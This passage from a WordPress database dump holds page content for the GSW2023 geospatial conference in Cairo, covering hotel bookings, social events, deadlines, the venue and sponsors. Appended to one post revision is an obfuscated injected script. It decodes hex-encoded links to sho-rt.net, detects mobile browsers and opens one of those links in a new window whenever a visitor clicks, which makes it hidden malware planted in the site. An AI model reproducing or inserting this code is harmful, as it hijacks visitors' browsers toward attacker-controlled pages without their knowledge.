#ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.hilton.com%2Fen%2Fattend-my-event%2Fcairhtw-gaas23-e979b836-791b-44ea-9095-410655c177d0%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690251704410{margin-top: 10px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][vc_btn title=\"For More Hotels\" color=\"info\" align=\"center\" link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fhotel-accommodation%2F\"][/vc_column][vc_column width=\"1/3\"][vc_column_text]</p>\n<h4 class=\"qrShPb pXs6bb PZPZlf q8U8x aTI8gc EaHP9c\" style=\"text-align: center;\" data-dtype=\"d3ifr\" data-local-attribute=\"d3bn\" data-attrid=\"title\" data-ved=\"2ahUKEwi88f_AuNX_AhU5gv0HHQT_D7wQ3B0oAHoECDsQAQ\"><span style=\"color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7); font-size: 18pt;\">Flamenco Cairo Hotel</span></h4>\n<h4></h4>\n<p><a href=\"https://www.flamencohotels.com/web/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter\" src=\"https://www.flamencohotels.com/web/wp-content/uploads/2020/02/4Z4A4470-Low.jpg\" alt=\"\" width=\"281\" height=\"187\" /></a></p>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"></h4>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is September 1, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fflamenco-cairo-hotel%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687391423079{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1687570749968{margin-top: 12px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668204929553{margin-top: 20px !important;}\" tick_size=\"desktop:50px;\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\" css=\".vc_custom_1687570624975{margin-top: 140px !important;}\"][/vc_column][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1687570128641{margin-top: -70px !important;}\"][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1692140427657{margin-top: 50px !important;}\"]</p>\n<h5 style=\"text-align: center;\"><strong>September 3, 2023</strong></h5>\n<h5 style=\"text-align: center;\"><strong><span lang=\"EN-US\">Dinner and Show on </span>Nile Crystal Cruising Restaurant</strong></h5>\n<p><img class=\"wp-image-5195 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/d2-1-300x300.jpg\" alt=\"\" width=\"198\" height=\"198\" />[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1687570551843{margin-top: 50px !important;}\"]</p>\n<h5 style=\"text-align: center;\">September 5, 2023</h5>\n<h5 style=\"text-align: center;\">Dinner and Show on The Citadel of Cairo</h5>\n<p><img class=\"wp-image-5196 size-medium aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/d1-1-300x201.jpg\" alt=\"\" width=\"300\" height=\"201\" />[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row content_placement=\"middle\" bg_type=\"image\" parallax_style=\"vcpb-default\" bg_image_new=\"id^3365|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-1-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" bg_image_posiiton=\"0\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.58)\"][vc_column width=\"1/2\" css=\".vc_custom_1686320668385{margin-top: -25px !important;}\"][ultimate_heading main_heading=\"Important Dates\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-top:25px;margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]</p>\n<ul>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Camera ready paper submission: July 15, 2023 </strong></span></h5>\n</li>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Deadline for submission of travel grants funded by The ISPRS Foundation is: June 16, 2023</strong></span></h5>\n</li>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Early bird registration deadline: July 1, 2023</strong></span></h5>\n</li>\n</ul>\n<p>[/ultimate_heading][ultimate_heading main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"][/ultimate_heading][/vc_column][vc_column width=\"1/2\"][ultimate_heading main_heading=\"Invitation Letter\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]</p>\n<h2 style=\"text-align: center;\"></h2>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>You can generate an invitation letter automatically once you provide your information.</strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span><strong><span style=\"color: #ffff00;\"><a style=\"color: #ffff00;\" href=\"https://visa.gsw2023.com/\" target=\"_blank\" rel=\"noopener\">Get Your Invitation letter</a></span></strong></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>If you require specific format for the Visa Letter, please Send email with the additional information to</strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffff00;\"><strong> </strong><a style=\"color: #ffff00;\" href=\"mailto:GSW-visa@gsw2023.com\" target=\"_blank\" rel=\"noopener\">GSW-visa@gsw2023.com</a><strong> </strong></span></h5>\n<p>[/ultimate_heading][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][vc_column_text]</p>\n<h3 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Keynotes Speakers and Panelists</strong></span></h3>\n<p>[/vc_column_text][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" img_max_width=\"200px\" image_paddings=\"10px 10px 10px 10px\" img_border_radius=\"10px\" bwb_columns=\"desktop:4|h_tablet:3|v_tablet:2|phone:1\" post_title_bottom_margin=\"0px\" show_team_desc=\"n\" read_more_button=\"off\" soc_icon_border_width=\"0px\" soc_icon_color=\"#ffffff\" posts_offset=\"0\" category=\"104\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]</p>\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo Semiramis</strong></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: justify; color: cyan;\"><strong>For More Information:</strong></h4>\n<p><span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span></p>\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_column_text]</p>\n<p style=\"text-align: center;\"><strong><a href=\"mailto:gsw2023@aast.edu\">gsw2023@aast.edu</a></strong></p>\n<p style=\"text-align: center;\"><strong> <a href=\"mailto:aaelbary@gsw2023.com\">aaelbary@gsw2023.com</a></strong></p>\n<p>[/vc_column_text][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-08-16 00:35:23','2023-08-16 00:35:23','',3066,'https://gsw2023.com/?p=5266',0,'revision','',0),
(5267,1,'2023-08-16 02:46:49','2023-08-16 02:46:49','','162298019_1883841675127522_2570662785891038901_o','','inherit','open','closed','','162298019_1883841675127522_2570662785891038901_o','','','2023-08-16 02:46:49','2023-08-16 02:46:49','',3066,'https://gsw2023.com/wp-content/uploads/2023/08/162298019_1883841675127522_2570662785891038901_o.jpg',0,'attachment','image/jpeg',0),
(5268,1,'2023-08-16 02:50:35','2023-08-16 02:50:35','<p>[vc_row css=\".vc_custom_1692141164274{margin-top: -50px !important;}\"][vc_column width=\"1/2\"][vc_column_text]</p>\n<h3 style=\"text-align: center;\"><span style=\"font-size: 24pt; color: #0000ff;\"><strong>Under the Auspices of </strong></span><br />\n<span style=\"font-size: 24pt; color: #0000ff;\"><strong>H.E. Professor Mostafa Madbouly,</strong></span><br />\n<span style=\"font-size: 24pt; color: #0000ff;\"><strong>Prime Minister of the Arab Republic of Egypt</strong></span></h3>\n<p>[/vc_column_text][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"5267\" img_size=\"250x250\" alignment=\"center\" style=\"vc_box_rounded\"][/vc_column][/vc_row][vc_separator style=\"shadow\" border_width=\"10\"][vc_row][vc_column][vc_column_text]</p>\n<h4 style=\"text-align: center;\"><strong><span style=\"font-size: 24pt;\">Prime Sponsors</span></strong></h4>\n<p>[/vc_column_text][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1692141338959{margin-top: 0px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p><a href=\"https://www.gasgi.gov.sa\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4592\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/شعار-الهيئة-العامة-للمساحه-والمعلومات-الجيومكانية-بالمملكة-العربية-السعودية-2-300x110.jpg\" alt=\"\" width=\"447\" height=\"164\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1692141365647{margin-top: 35px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p><a href=\"https://www.tra.gov.eg/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5009 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/ntra-300x116.jpg\" alt=\"\" width=\"300\" height=\"116\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1692141399321{margin-top: 45px !important;}\"]<a href=\"https://www.mbrsc.ae/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5093 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/MBRSC-LOGO_1-01-300x149.png\" alt=\"\" width=\"300\" height=\"149\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/4\"][vc_column_text 